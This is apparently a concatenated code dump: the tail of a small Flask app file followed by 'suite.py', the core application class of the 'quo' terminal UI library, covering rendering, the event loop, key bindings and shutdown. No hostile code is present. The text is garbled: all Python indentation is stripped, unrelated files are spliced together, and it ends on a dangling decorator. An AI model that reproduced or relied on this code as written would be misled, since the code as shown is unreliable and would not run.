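# actual response payload depends on NodeApi in routes/nodes.py, which is not
# shown here.
def _example_list_nodes():
    with app.test_client() as client:
        resp = client.get('/api/nodes')
        return resp.status_code, resp.get_json()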
if __name__ == '__main__':
# run app instance
app.run(host=FLASK_HOST, port=FLASK_PORT, threaded=True)
|
suite.py
|
import asyncio
import os
import re
import signal
import sys
import threading
import time
from asyncio import (
AbstractEventLoop,
CancelledError,
Future,
Task,
ensure_future,
get_event_loop,
new_event_loop,
set_event_loop,
sleep,
)
from contextlib import contextmanager
from subprocess import Popen
from traceback import format_tb
from typing import (
Any,
Awaitable,
Callable,
Dict,
FrozenSet,
Generator,
Generic,
Hashable,
Iterable,
List,
Optional,
Tuple,
Type,
TypeVar,
Union,
cast,
overload,
)
from quo.buffer import Buffer
from quo.i_o.termui import echo
from quo.cache import SimpleCache
from quo.clipboard import Clipboard, InMemoryClipboard
from quo.data_structures import Size
from quo.enums import EditingMode
from quo.eventloop import (
get_traceback_from_context,
run_in_executor_with_context,
)
from quo.eventloop.utils import call_soon_threadsafe
from quo.filters import Condition, Filter, FilterOrBool, to_filter
from quo.text import AnyFormattedText
from quo.input.core import Input
from quo.input.typeahead import get_typeahead, store_typeahead
from quo.keys.key_binding.bindings.page_navigation import (
load_page_navigation_bindings,
)
from quo.keys.key_binding.defaults import load_key_bindings
from quo.keys.key_binding.emacs_state import EmacsState
from quo.keys.key_binding.key_bindings import (
Binding,
ConditionalKeyBindings,
GlobalOnlyKeyBindings,
KeyBindingsBase,
KeysTuple,
merge_key_bindings,
)
from quo.keys.key_binding.key_processor import KeyPressEvent, KeyProcessor
from quo.keys.key_binding.vi_state import ViState
from quo.keys import Keys
from quo.layout import Container, Window
from quo.layout.controls import BufferControl, UIControl
from quo.layout.dummy import create_dummy_layout
from quo.layout.layout import Layout, walk
from quo.output import ColorDepth, Output
from quo.renderer import Renderer, print_formatted_text
from quo.search import SearchState
from quo.styles import (
BaseStyle,
DummyStyle,
DummyStyleTransformation,
DynamicStyle,
StyleTransformation,
default_pygments_style,
default_ui_style,
merge_styles,
)
from quo.utils.utils import Event, in_main_thread
from .current import get_app_session, set_app
from .run_in_terminal import in_terminal, run_in_terminal
try:
import contextvars
except ImportError:
import quo.eventloop.dummy_contextvars as contextvars # type: ignore
#__all__ = [
# "Suite",
#]
E = KeyPressEvent
_AppResult = TypeVar("_AppResult")
# event handler
onSuite = Callable[["Suite[_AppResult]"], None]
_SIGWINCH = getattr(signal, "SIGWINCH", None)
_SIGTSTP = getattr(signal, "SIGTSTP", None)
class Suite(Generic[_AppResult]):
"""
The main Suite class!
This glues everything together.
:param layout: A :class:`~quo.layout.Layout` instance.
:param key_bindings:
:class:`~quo.keys.key_binding.KeyBindingsBase` instance for
the key bindings.
:param clipboard: :class:`~quo.clipboard.Clipboard` to use.
:param full_screen: When True, run the application on the alternate screen buffer.
:param color_depth: Any :class:`~.ColorDepth` value, a callable that
returns a :class:`~.ColorDepth` or `None` for default.
:param erase_when_done: (bool) Clear the application output when it finishes.
:param reverse_vi_search_direction: Normally, in Vi mode, a '/' searches
forward and a '?' searches backward. In Readline mode, this is usually
reversed.
:param min_redraw_interval: Number of seconds to wait between redraws. Use
this for applications where `invalidate` is called a lot. This could cause
a lot of terminal output, which some terminals are not able to process.
`None` means that every `invalidate` will be scheduled right away
(which is usually fine).
When one `invalidate` is called, but a scheduled redraw of a previous
`invalidate` call has not been executed yet, nothing will happen in any
case.
:param max_render_postpone_time: When there is high CPU (a lot of other
scheduled calls), postpone the rendering max x seconds. '0' means:
don't postpone. '.5' means: try to draw at least twice a second.
:param refresh_interval: Automatically invalidate the UI every so many
seconds. When `None` (the default), only invalidate when `invalidate`
has been called.
:param terminal_size_polling_interval: Poll the terminal size every so many
seconds. Useful if the application runs in a thread other than the
main thread where SIGWINCH can't be handled, or on Windows.
Filters:
:param mouse_support: (:class:`~quo.filters.Filter` or
boolean). When True, enable mouse support.
:param paste_mode: :class:`~quo.filters.Filter` or boolean.
:param editing_mode: :class:`~quo.enums.EditingMode`.
:param enable_page_navigation_bindings: When `True`, enable the page
navigation key bindings. These include both Emacs and Vi bindings like
page-up, page-down and so on to scroll through pages. Mostly useful for
creating an editor or other full screen applications. Probably, you
don't want this for the implementation of a REPL. By default, this is
enabled if `full_screen` is set.
Callbacks (all of these should accept an
:class:`~quo.application.Suite` object as input.)
:param on_reset: Called during reset.
:param on_invalidate: Called when the UI has been invalidated.
:param before_render: Called right before rendering.
:param after_render: Called right after rendering.
I/O:
(Note that the preferred way to change the input/output is by creating an
`AppSession` with the required input/output objects. If you need multiple
applications running at the same time, you have to create a separate
`AppSession` using a `with create_app_session():` block.)
:param input: :class:`~quo.input.Input` instance.
:param output: :class:`~quo.output.Output` instance. (Probably
Vt100_Output or Win32Output.)
Usage:
app = Suite(...)
app.run()
# Or
await app.run_async()
"""
def __init__(
self,
layout: Optional[Layout] = None,
style: Optional[BaseStyle] = None,
include_default_pygments_style: FilterOrBool = True,
style_transformation: Optional[StyleTransformation] = None,
bind: Optional[KeyBindingsBase] = None,
clipboard: Optional[Clipboard] = None,
full_screen: bool = False,
color_depth: Union[
ColorDepth, Callable[[], Union[ColorDepth, None]], None
] = None,
mouse_support: FilterOrBool = False,
enable_page_navigation_bindings: Optional[
FilterOrBool
] = None, # Can be None, True or False.
paste_mode: FilterOrBool = False,
editing_mode: EditingMode = EditingMode.EMACS,
erase_when_done: bool = False,
reverse_vi_search_direction: FilterOrBool = False,
min_redraw_interval: Union[float, int, None] = None,
max_render_postpone_time: Union[float, int, None] = 0.01,
refresh_interval: Optional[float] = None,
terminal_size_polling_interval: Optional[float] = 0.5,
on_reset: Optional[onSuite] = None,
on_invalidate: Optional[onSuite] = None,
before_render: Optional[onSuite] = None,
after_render: Optional[onSuite] = None,
# I/O.
input: Optional[Input] = None,
output: Optional[Output] = None,
) -> None:
# If `enable_page_navigation_bindings` is not specified, enable it in
# case of full screen applications only. This can be overridden by the user.
if enable_page_navigation_bindings is None:
enable_page_navigation_bindings = Condition(lambda: self.full_screen)
paste_mode = to_filter(paste_mode)
mouse_support = to_filter(mouse_support)
reverse_vi_search_direction = to_filter(reverse_vi_search_direction)
enable_page_navigation_bindings = to_filter(enable_page_navigation_bindings)
include_default_pygments_style = to_filter(include_default_pygments_style)
if layout is None:
layout = create_dummy_layout()
if style_transformation is None:
style_transformation = DummyStyleTransformation()
self.style = style
self.style_transformation = style_transformation
# Key bindings.
self.bind = bind
self._default_bindings = load_key_bindings()
self._page_navigation_bindings = load_page_navigation_bindings()
self.layout = layout
self.clipboard = clipboard or InMemoryClipboard()
self.full_screen: bool = full_screen
self._color_depth = color_depth
self.mouse_support = mouse_support
self.paste_mode = paste_mode
self.editing_mode = editing_mode
self.erase_when_done = erase_when_done
self.reverse_vi_search_direction = reverse_vi_search_direction
self.enable_page_navigation_bindings = enable_page_navigation_bindings
self.min_redraw_interval = min_redraw_interval
self.max_render_postpone_time = max_render_postpone_time
self.refresh_interval = refresh_interval
self.terminal_size_polling_interval = terminal_size_polling_interval
# Events.
self.on_invalidate = Event(self, on_invalidate)
self.on_reset = Event(self, on_reset)
self.before_render = Event(self, before_render)
self.after_render = Event(self, after_render)
# I/O.
session = get_app_session()
self.output = output or session.output
self.input = input or session.input
# List of 'extra' functions to execute before a Suite.run.
self.pre_run_callables: List[Callable[[], None]] = []
self._is_running = False
self.future: Optional[Future[_AppResult]] = None
self.loop: Optional[AbstractEventLoop] = None
self.context: Optional[contextvars.Context] = None
#: Quoted insert. This flag is set if we go into quoted insert mode.
self.quoted_insert = False
#: Vi state. (For Vi key bindings.)
self.vi_state = ViState()
self.emacs_state = EmacsState()
#: When to flush the input (For flushing escape keys.) This is important
#: on terminals that use vt100 input. We can't distinguish the escape
#: key from for instance the left-arrow key, if we don't know what follows
#: after "\x1b". This little timer will consider "\x1b" to be escape if
#: nothing follows within this time span.
#: This seems to work like the `ttimeoutlen` option in Vim.
self.ttimeoutlen = 0.5 # Seconds.
#: Like Vim's `timeoutlen` option. This can be `None` or a float. For
#: instance, suppose that we have a key binding AB and a second key
#: binding A. If the user presses A and then waits, we don't handle
#: this binding yet (unless it was marked 'eager'), because we don't
#: know what will follow. This timeout is the maximum amount of time
#: that we wait until we call the handlers anyway. Pass `None` to
#: disable this timeout.
self.timeoutlen = 1.0
#: The `Renderer` instance.
# Make sure that the same stdout is used, when a custom renderer has been passed.
self._merged_style = self._create_merged_style(include_default_pygments_style)
self.renderer = Renderer(
self._merged_style,
self.output,
full_screen=full_screen,
mouse_support=mouse_support,
cpr_not_supported_callback=self.cpr_not_supported_callback,
)
#: Render counter. This one is increased every time the UI is rendered.
#: It can be used as a key for caching certain information during one
#: rendering.
self.render_counter = 0
# Invalidate flag. When 'True', a repaint has been scheduled.
self._invalidated = False
self._invalidate_events: List[
Event[object]
] = [] # Collection of 'invalidate' Event objects.
self._last_redraw_time = 0.0 # Unix timestamp of last redraw. Used when
# `min_redraw_interval` is given.
#: The `InputProcessor` instance.
self.key_processor = KeyProcessor(_CombinedRegistry(self))
# If `run_in_terminal` was called, this will point to a `Future` that will be
# set at the point when the previous run finishes.
self._running_in_terminal = False
self._running_in_terminal_f: Optional[Future[None]] = None
# Trigger initialize callback.
self.reset()
def _create_merged_style(self, include_default_pygments_style: Filter) -> BaseStyle:
"""
Create a `Style` object that merges the default UI style, the default
pygments style, and the custom user style.
"""
dummy_style = DummyStyle()
pygments_style = default_pygments_style()
@DynamicStyle
def conditional_pygments_style() -> BaseStyle:
if include_default_pygments_style():
return pygments_style
else:
return dummy_style
return merge_styles(
[
default_ui_style(),
conditional_pygments_style,
DynamicStyle(lambda: self.style),
]
)
@property
def color_depth(self) -> ColorDepth:
"""
The active :class:`.ColorDepth`.
The current value is determined as follows:
- If a color depth was given explicitly to this application, use that
value.
- Otherwise, fall back to the color depth that is reported by the
:class:`.Output` implementation. If the :class:`.Output` class was
created using `output.defaults.create_output`, then this value is
coming from the $QUO_COLOR_DEPTH environment variable.
"""
depth = self._color_depth
if callable(depth):
depth = depth()
if depth is None:
depth = self.output.get_default_color_depth()
return depth
@property
def current_buffer(self) -> Buffer:
"""
The currently focused :class:`~.Buffer`.
(This returns a dummy :class:`.Buffer` when none of the actual buffers
has the focus. In this case, it's really not practical to check for
`None` values or catch exceptions every time.)
"""
return self.layout.current_buffer or Buffer(
name="dummy-buffer"
) # Dummy buffer.
@property
def current_search_state(self) -> SearchState:
"""
Return the current :class:`.SearchState`. (The one for the focused
:class:`.BufferControl`.)
"""
ui_control = self.layout.current_control
if isinstance(ui_control, BufferControl):
return ui_control.search_state
else:
return SearchState() # Dummy search state. (Don't return None!)
def reset(self) -> None:
"""
Reset everything, for reading the next input.
"""
# Notice that we don't reset the buffers. (This happens just before
# returning, and when we have multiple buffers, we clearly want the
# content in the other buffers to remain unchanged between several
# calls of `run`. (And the same is true for the focus stack.)
self.exit_style = ""
self.background_tasks: List[Task[None]] = []
self.renderer.reset()
self.key_processor.reset()
self.layout.reset()
self.vi_state.reset()
self.emacs_state.reset()
# Trigger reset event.
self.on_reset.fire()
# Make sure that we have a 'focusable' widget focused.
# (The `Layout` class can't determine this.)
layout = self.layout
if not layout.current_control.is_focusable():
for w in layout.find_all_windows():
if w.content.is_focusable():
layout.current_window = w
break
def invalidate(self) -> None:
"""
Thread safe way of sending a repaint trigger to the input event loop.
"""
if not self._is_running:
return
# Ignore `invalidate()` calls made before we have a loop (not running yet?),
# or after the event loop was closed.
if self.loop is None or self.loop.is_closed():
return
# Never schedule a second redraw, when a previous one has not yet been
# executed. (This should protect against other threads calling
# 'invalidate' many times, resulting in 100% CPU.)
if self._invalidated:
return
else:
self._invalidated = True
# Trigger event.
self.loop.call_soon_threadsafe(self.on_invalidate.fire)
def redraw() -> None:
self._invalidated = False
self._redraw()
def schedule_redraw() -> None:
call_soon_threadsafe(
redraw, max_postpone_time=self.max_render_postpone_time, loop=self.loop
)
if self.min_redraw_interval:
# When a minimum redraw interval is set, wait minimum this amount
# of time between redraws.
diff = time.time() - self._last_redraw_time
if diff < self.min_redraw_interval:
async def redraw_in_future() -> None:
await sleep(cast(float, self.min_redraw_interval) - diff)
schedule_redraw()
self.loop.call_soon_threadsafe(
lambda: self.create_background_task(redraw_in_future())
)
else:
schedule_redraw()
else:
schedule_redraw()
@property
def invalidated(self) -> bool:
"True when a redraw operation has been scheduled."
return self._invalidated
def _redraw(self, render_as_done: bool = False) -> None:
"""
Render the command line again. (Not thread safe!) (From other threads,
or if unsure, use :meth:`.Suite.invalidate`.)
:param render_as_done: make sure to put the cursor after the UI.
"""
def run_in_context() -> None:
# Only draw when no sub application was started.
if self._is_running and not self._running_in_terminal:
if self.min_redraw_interval:
self._last_redraw_time = time.time()
# Render
self.render_counter += 1
self.before_render.fire()
if render_as_done:
if self.erase_when_done:
self.renderer.erase()
else:
# Draw in 'done' state and reset renderer.
self.renderer.render(self, self.layout, is_done=render_as_done)
else:
self.renderer.render(self, self.layout)
self.layout.update_parents_relations()
# Fire render event.
self.after_render.fire()
self._update_invalidate_events()
# NOTE: We want to make sure this Suite is the active one. The
# invalidate function is often called from a context where this
# application is not the active one. (Like the
# `PromptSession._auto_refresh_context`).
# We copy the context in case the context was already active, to
# prevent RuntimeErrors. (The rendering is not supposed to change
# any context variables.)
if self.context is not None:
self.context.copy().run(run_in_context)
def _start_auto_refresh_task(self) -> None:
"""
Start a while/true loop in the background for automatic invalidation of
the UI.
"""
if self.refresh_interval is not None and self.refresh_interval != 0:
async def auto_refresh(refresh_interval: float) -> None:
while True:
await sleep(refresh_interval)
self.invalidate()
self.create_background_task(auto_refresh(self.refresh_interval))
def _update_invalidate_events(self) -> None:
"""
Make sure to attach 'invalidate' handlers to all invalidate events in
the UI.
"""
# Remove all the original event handlers. (Components can be removed
# from the UI.)
for ev in self._invalidate_events:
ev -= self._invalidate_handler
# Gather all new events.
# (All controls are able to invalidate themselves.)
def gather_events() -> Iterable[Event[object]]:
for c in self.layout.find_all_controls():
for ev in c.get_invalidate_events():
yield ev
self._invalidate_events = list(gather_events())
for ev in self._invalidate_events:
ev += self._invalidate_handler
def _invalidate_handler(self, sender: object) -> None:
"""
Handler for invalidate events coming from UIControls.
(This handles the difference in signature between event handler and
`self.invalidate`. It also needs to be a method - not a nested
function - so that we can remove it again.)
"""
self.invalidate()
def _on_resize(self) -> None:
"""
When the window size changes, we erase the current output and request
again the cursor position. When the CPR answer arrives, the output is
drawn again.
"""
# Erase, request position (when cursor is at the start position)
# and redraw again. -- The order is important.
self.renderer.erase(leave_alternate_screen=False)
self._request_absolute_cursor_position()
self._redraw()
def _pre_run(self, pre_run: Optional[Callable[[], None]] = None) -> None:
"""
Called during `run`.
`self.future` should be set to the new future at the point where this
is called in order to avoid data races. `pre_run` can be used to set a
`threading.Event` to synchronize with UI termination code, running in
another thread that would call `Suite.exit`. (See the progress
bar code for an example.)
"""
if pre_run:
pre_run()
# Process registered "pre_run_callables" and clear list.
for c in self.pre_run_callables:
c()
del self.pre_run_callables[:]
async def run_async(
self,
pre_run: Optional[Callable[[], None]] = None,
set_exception_handler: bool = True,
) -> _AppResult:
"""
Run the quo :class:`~quo.Suite`
until :meth:`~quo.Suite.exit` has been
called. Return the value that was passed to
:meth:`~quo.Suite.exit`.
This is the main entry point for a quo
:class:`~quo.Suite` and usually the only
place where the event loop is actually running.
:param pre_run: Optional callable, which is called right after the
"reset" of the application.
:param set_exception_handler: When set, in case of an exception, go out
of the alternate screen and hide the application, display the
exception, and wait for the user to press ENTER.
"""
assert not self._is_running, "Suite is already running."
async def _run_async() -> _AppResult:
"Coroutine."
loop = get_event_loop()
f = loop.create_future()
self.future = f # XXX: make sure to set this before calling '_redraw'.
self.loop = loop
self.context = contextvars.copy_context()
# Counter for cancelling 'flush' timeouts. Every time when a key is
# pressed, we start a 'flush' timer for flushing our escape key. But
# when any subsequent input is received, a new timer is started and
# the current timer will be ignored.
flush_task: Optional[asyncio.Task[None]] = None
# Reset.
# (`self.future` needs to be set when `pre_run` is called.)
self.reset()
self._pre_run(pre_run)
# Feed type ahead input first.
self.key_processor.feed_multiple(get_typeahead(self.input))
self.key_processor.process_keys()
def read_from_input() -> None:
nonlocal flush_task
# Ignore when we aren't running anymore. This callback will
# be removed from the loop next time. (It could be that it was
# still in the 'tasks' list of the loop.)
# Except: if we need to process incoming CPRs.
if not self._is_running and not self.renderer.waiting_for_cpr:
return
# Get keys from the input object.
keys = self.input.read_keys()
# Feed to key processor.
self.key_processor.feed_multiple(keys)
self.key_processor.process_keys()
# Quit when the input stream was closed.
if self.input.closed:
if not f.done():
f.set_exception(EOFError)
else:
# Automatically flush keys.
if flush_task:
flush_task.cancel()
flush_task = self.create_background_task(auto_flush_input())
async def auto_flush_input() -> None:
# Flush input after timeout.
# (Used for flushing the escape key.)
# This sleep can be cancelled, in that case we won't flush yet.
await sleep(self.ttimeoutlen)
flush_input()
def flush_input() -> None:
if not self.is_done:
# Get keys, and feed to key processor.
keys = self.input.flush_keys()
self.key_processor.feed_multiple(keys)
self.key_processor.process_keys()
if self.input.closed:
f.set_exception(EOFError)
# Enter raw mode, attach input and attach WINCH event handler.
with self.input.raw_mode(), self.input.attach(
read_from_input
), attach_winch_signal_handler(self._on_resize):
self.create_background_task(self._poll_output_size())
# Draw UI.
self._request_absolute_cursor_position()
self._redraw()
self._start_auto_refresh_task()
# Wait for UI to finish.
try:
result = await f
finally:
# In any case, when the application finishes.
# (Successful, or because of an error.)
try:
self._redraw(render_as_done=True)
finally:
# _redraw has a good chance to fail if it calls widgets
# with bad code. Make sure to reset the renderer
# anyway.
self.renderer.reset()
# Unset `is_running`, this ensures that possibly
# scheduled draws won't paint during the following
# yield.
self._is_running = False
# Detach event handlers for invalidate events.
# (Important when a UIControl is embedded in multiple
# applications, like ptterm in pymux. An invalidate
# should not trigger a repaint in terminated
# applications.)
for ev in self._invalidate_events:
ev -= self._invalidate_handler
self._invalidate_events = []
# Wait for CPR responses.
if self.output.responds_to_cpr:
await self.renderer.wait_for_cpr_responses()
# Wait for the run-in-terminals to terminate.
previous_run_in_terminal_f = self._running_in_terminal_f
if previous_run_in_terminal_f:
await previous_run_in_terminal_f
# Store unprocessed input as typeahead for next time.
store_typeahead(self.input, self.key_processor.empty_queue())
return result
async def _run_async2() -> _AppResult:
self._is_running = True
# Make sure to set `_invalidated` to `False` to begin with,
# otherwise we're not going to paint anything. This can happen if
# this application had run before on a different event loop, and a
# paint was scheduled using `call_soon_threadsafe` with
# `max_postpone_time`.
self._invalidated = False
loop = get_event_loop()
if set_exception_handler:
previous_exc_handler = loop.get_exception_handler()
loop.set_exception_handler(self._handle_exception)
try:
with set_app(self):
try:
result = await _run_async()
finally:
# Wait for the background tasks to be done. This needs to
# go in the finally! If `_run_async` raises
# `KeyboardInterrupt`, we still want to wait for the
# background tasks.
await self.cancel_and_wait_for_background_tasks()
# Set the `_is_running` flag to `False`. Normally this
# happened already in the finally block in `run_async`
# above, but in case of exceptions, that's not always the
# case.
self._is_running = False
# Also remove the Future again. (This brings the
# application back to its initial state, where it also
# doesn't have a Future.)
self.future = None
return result
finally:
if set_exception_handler:
loop.set_exception_handler(previous_exc_handler)
return await _run_async2()
def run(
self,
pre_run: Optional[Callable[[], None]] = None,
set_exception_handler: bool = True,
in_thread: bool = False,
) -> _AppResult:
"""
A blocking 'run' call that waits until the UI is finished.
This will start the current asyncio event loop. If no loop is set for
the current thread, then it will create a new loop. If a new loop was
created, this won't close the new loop (if `in_thread=False`).
:param pre_run: Optional callable, which is called right after the
"reset" of the application.
:param set_exception_handler: When set, in case of an exception, go out
of the alternate screen and hide the application, display the
exception, and wait for the user to press ENTER.
:param in_thread: When true, run the application in a background
thread, and block the current thread until the application
terminates. This is useful if we need to be sure the application
won't use the current event loop (asyncio does not support nested
event loops). A new event loop will be created in this background
thread, and that loop will also be closed when the background
thread terminates. When this is used, it's especially important to
make sure that all asyncio background tasks are managed through
`get_app().create_background_task()`, so that unfinished tasks are
properly cancelled before the event loop is closed. This is used
for instance in ptpython.
"""
if in_thread:
result: _AppResult
exception: Optional[BaseException] = None
def run_in_thread() -> None:
nonlocal result, exception
try:
result = self.run(
pre_run=pre_run, set_exception_handler=set_exception_handler
)
except BaseException as e:
exception = e
finally:
# Make sure to close the event loop in this thread. Running
# the application creates a new loop (because we're in
# another thread), but it doesn't get closed automatically
# (also not by the garbage collector).
loop = get_event_loop()
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
thread = threading.Thread(target=run_in_thread)
thread.start()
thread.join()
if exception is not None:
raise exception
return result
# We don't create a new event loop by default, because we want to be
# sure that when this is called multiple times, each call of `run()`
# goes through the same event loop. This way, users can schedule
# background-tasks that keep running across multiple prompts.
try:
loop = get_event_loop()
except RuntimeError:
# Possibly we are not running in the main thread, where no event
# loop is set by default. Or somebody called `asyncio.run()`
# before, which closes the existing event loop. We can create a new
# loop.
loop = new_event_loop()
set_event_loop(loop)
return loop.run_until_complete(
self.run_async(pre_run=pre_run, set_exception_handler=set_exception_handler)
)
def _handle_exception(
self,
loop: AbstractEventLoop,
context: Dict[str, Any]
) -> None:
"""
Handler for event loop exceptions.
This will print the exception, using run_in_terminal.
"""
# For Python 2: we have to get traceback at this point, because
# we're still in the 'except:' block of the event loop where the
# traceback is still available. Moving this code in the
# 'print_exception' coroutine will lose the exception.
tb = get_traceback_from_context(context)
formatted_tb = "".join(format_tb(tb))
async def in_term() -> None:
async with in_terminal():
# Print output. Similar to 'loop.default_exception_handler',
# but don't use logger. (This works better on Python 2.)
echo(f"Unhandled ", nl=False)
echo(f"exception", fg="black", bg="yellow", nl=False)
echo(f" in the event loop:")
echo(formatted_tb)
print("Exception %s" % (context.get("exception"),))
await _do_wait_for_enter("𝙿𝚛𝚎𝚜𝚜 𝙴𝙽𝚃𝙴𝚁 𝚝𝚘 𝚌𝚘𝚗𝚝𝚒𝚗𝚞𝚎...⏳")
ensure_future(in_term())
def create_background_task(
self,
coroutine: Awaitable[None]
) -> "asyncio.Task[None]":
"""
Start a background task (coroutine) for the running application. When
the `Suite` terminates, unfinished background tasks will be
cancelled.
If asyncio had nurseries like Trio, we would create a nursery in
`Suite.run_async`, and run the given coroutine in that nursery.
Not threadsafe.
"""
task = get_event_loop().create_task(coroutine)
self.background_tasks.append(task)
return task
async def cancel_and_wait_for_background_tasks(self) -> None:
"""
Cancel all background tasks, and wait for the cancellation to be done.
If any of the background tasks raised an exception, this will also
propagate the exception.
(If we had nurseries like Trio, this would be the `__aexit__` of a
nursery.)
"""
for task in self.background_tasks:
task.cancel()
for task in self.background_tasks:
try:
await task
except CancelledError:
pass
async def _poll_output_size(self) -> None:
"""
Coroutine for polling the terminal dimensions.
Useful for situations where `attach_winch_signal_handler` is not sufficient:
- If we are not running in the main thread.
- On Windows.
"""
size: Optional[Size] = None
interval = self.terminal_size_polling_interval
if interval is None:
return
while True:
await asyncio.sleep(interval)
new_size = self.output.get_size()
if size is not None and new_size != size:
self._on_resize()
size = new_size
def cpr_not_supported_callback(self) -> None:
"""
Called when we don't receive the cursor position response in time.
"""
if not self.output.responds_to_cpr:
return # We know about this already.
def in_terminal() -> None:
self.output.write(
"WARNING: your terminal doesn't support cursor position requests (CPR).\r\n"
)
self.output.flush()
run_in_terminal(in_terminal)
@overload
def exit(self) -> None:
"Exit without arguments."
@overload
def exit(self,
*,
result: _AppResult,
style: str = ""
) -> None:
"Exit with `_AppResult`."
@overload
def exit(
self,
*,
exception: Union[BaseException, Type[BaseException]],
style: str = ""
) -> None:
"Exit with exception."
def exit(
self,
result: Optional[_AppResult] = None,
exception: Optional[Union[BaseException, Type[BaseException]]] = None,
style: str = "",
) -> None:
"""
Exit application.
.. note::
If `Suite.exit` is called before `Suite.run()` is
called, then the `Suite` won't exit (because the
`Suite.future` doesn't correspond to the current run). Use a
`pre_run` hook and an event to synchronize the closing if there's a
chance this can happen.
:param result: Set this result for the application.
:param exception: Set this exception as the result for an application. For
a prompt, this is often `EOFError` or `KeyboardInterrupt`.
:param style: Apply this style on the whole content when quitting,
often this is 'class:exiting' for a prompt. (Used when
`erase_when_done` is not set.)
"""
assert result is None or exception is None
if self.future is None:
raise Exception("Suite is not running. Suite.exit() failed.")
if self.future.done():
raise Exception("Return value already set. Suite.exit() failed.")
self.exit_style = style
if exception is not None:
self.future.set_exception(exception)
else:
self.future.set_result(cast(_AppResult, result))
def _request_absolute_cursor_position(self) -> None:
"""
Send CPR request.
"""
# Note: only do this if the input queue is not empty, and a return
# value has not been set. Otherwise, we won't be able to read the
# response anyway.
if not self.key_processor.input_queue and not self.is_done:
self.renderer.request_absolute_cursor_position()
async def run_system_command(
self,
command: str,
wait_for_enter: bool = True,
display_before_text: AnyFormattedText = "",
wait_text: str = "𝙿𝚛𝚎𝚜𝚜 𝙴𝙽𝚃𝙴𝚁 𝚝𝚘 𝚌𝚘𝚗𝚝𝚒𝚗𝚞𝚎...⏳",
) -> None:
"""
Run system command (While hiding the prompt. When finished, all the
output will scroll above the prompt.)
:param command: Shell command to be executed.
:param wait_for_enter: Wait for the user to press enter, when the
command is finished.
:param display_before_text: If given, text to be displayed before the
command executes.
:return: None. This coroutine simply completes when the command (and the
optional "press enter" prompt) has finished.
"""
async with in_terminal():
# Try to use the same input/output file descriptors as the ones
# used to run this application.
try:
input_fd = self.input.fileno()
except AttributeError:
input_fd = sys.stdin.fileno()
try:
output_fd = self.output.fileno()
except AttributeError:
output_fd = sys.stdout.fileno()
# Run sub process.
def run_command() -> None:
self.print_text(display_before_text)
p = Popen(command, shell=True, stdin=input_fd, stdout=output_fd)
p.wait()
await run_in_executor_with_context(run_command)
# Wait for the user to press enter.
if wait_for_enter:
await _do_wait_for_enter(wait_text)
def suspend_to_background(self, suspend_group: bool = True) -> None:
"""
(Not thread safe -- to be called from inside the key bindings.)
Suspend process.
:param suspend_group: When true, suspend the whole process group.
(This is the default, and probably what you want.)
"""
# Only suspend when the operating system supports it.
# (Not on Windows.)
if _SIGTSTP is not None:
def run() -> None:
# Send `SIGTSTP` to own process.
# This will cause it to suspend.
# Usually we want the whole process group to be suspended. This
# handles the case when input is piped from another process.
if suspend_group:
os.kill(0, _SIGTSTP)
else:
os.kill(os.getpid(), _SIGTSTP)
run_in_terminal(run)
def print_text(
self, text: AnyFormattedText, style: Optional[BaseStyle] = None
) -> None:
"""
Print a list of (style_str, text) tuples to the output.
(When the UI is running, this method has to be called through
`run_in_terminal`, otherwise it will destroy the UI.)
:param text: List of ``(style_str, text)`` tuples.
:param style: Style class to use. Defaults to the active style in the CLI.
"""
print_formatted_text(
output=self.output,
formatted_text=text,
style=style or self._merged_style,
color_depth=self.color_depth,
style_transformation=self.style_transformation,
)
@property
def is_running(self) -> bool:
"`True` when the application is currently active/running."
return self._is_running
@property
def is_done(self) -> bool:
if self.future:
return self.future.done()
return False
def get_used_style_strings(self) -> List[str]:
"""
Return a list of used style strings. This is helpful for debugging, and
for writing a new `Style`.
"""
attrs_for_style = self.renderer._attrs_for_style
if attrs_for_style:
return sorted(
[
re.sub(r"\s+", " ", style_str).strip()
for style_str in attrs_for_style.keys()
]
)
return []
class _CombinedRegistry(KeyBindingsBase):
"""
The combined key bindings registry for a `Suite`.
This merges the global key bindings with those of the currently focused
user control.
"""
def __init__(self,
app: Suite[_AppResult]
)-> None:
self.app = app
self._cache: SimpleCache[
Tuple[Window, FrozenSet[UIControl]], KeyBindingsBase
] = SimpleCache()
@property
def _version(self) -> Hashable:
"""Not needed - this object is not going to be wrapped in another
KeyBindings object."""
raise NotImplementedError
def bindings(self) -> List[Binding]:
"""Not needed - this object is not going to be wrapped in another
KeyBinder object."""
raise NotImplementedError
def _create_key_bindings(
self,
current_window: Window,
other_controls: List[UIControl]
) -> KeyBindingsBase:
"""
Create a `KeyBinder` object that merges the `KeyBinder` from the
`UIControl` with all the parent controls and the global key bindings.
"""
bind = []
collected_containers = set()
# Collect key bindings from currently focused control and all parent
# controls. Don't include key bindings of container parent controls.
container: Container = current_window
while True:
collected_containers.add(container)
kb = container.get_key_bindings()
if kb is not None:
bind.append(kb)
if container.is_modal():
break
parent = self.app.layout.get_parent(container)
if parent is None:
break
else:
container = parent
# Include global bindings (starting at the topmost modal container).
for c in walk(container):
if c not in collected_containers:
kb = c.get_key_bindings()
if kb is not None:
bind.append(GlobalOnlyKeyBindings(kb))
# Add App key bindings
if self.app.bind:
bind.append(self.app.bind)
# Add mouse bindings.
bind.append(
ConditionalKeyBindings(
self.app._page_navigation_bindings,
self.app.enable_page_navigation_bindings,
)
)
bind.append(self.app._default_bindings)
# Reverse this list. The current control's key bindings should come
# last. They need priority.
bind = bind[::-1]
return merge_key_bindings(bind)
@property
def _key_bindings(self) -> KeyBindingsBase:
current_window = self.app.layout.current_window
other_controls = list(self.app.layout.find_all_controls())
key = current_window, frozenset(other_controls)
return self._cache.get(
key, lambda: self._create_key_bindings(current_window, other_controls)
)
def get_bindings_for_keys(self, keys: KeysTuple) -> List[Binding]:
return self._key_bindings.get_bindings_for_keys(keys)
def get_bindings_starting_with_keys(self, keys: KeysTuple) -> List[Binding]:
return self._key_bindings.get_bindings_starting_with_keys(keys)
async def _do_wait_for_enter(wait_text: AnyFormattedText) -> None:
"""
Create a sub application to wait for the enter key press.
This has two advantages over using 'input'/'raw_input':
- This will share the same input/output I/O.
- This doesn't block the event loop.
"""
from quo.shortcuts import Prompt
from quo.keys import KeyBinder
key_bindings = KeyBinder()
@key_bindings.add("enter")
def _ok(event: E) -> None:
event.app.exit()
@key_bindings.add(Keys.Any)
def _ignore(event: E) -> None:
"Disallow typing."
pass
session: Prompt[None] = Prompt(
text=wait_text, key_bindings=key_bindings
)
await session.app.run_async()
@contextmanager
